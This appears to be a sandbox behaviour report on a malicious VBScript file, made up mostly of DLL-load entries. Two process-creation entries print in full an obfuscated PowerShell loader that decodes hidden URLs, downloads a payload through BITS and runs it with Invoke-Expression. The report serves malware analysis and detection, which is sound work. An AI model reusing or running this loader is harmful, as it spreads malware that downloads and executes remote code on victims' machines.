          Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
          Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
          Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
          Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
          Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla 
,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi 
OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbat
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF8489DB1F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF8489DA036
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02C8CC38
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02C8D508
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02C8C8F0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07196E08
          Source: BKGCONF-THD1914129-BKGCONF-THD1914129.vbs Initial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: policymanager.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msvcp110_win.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
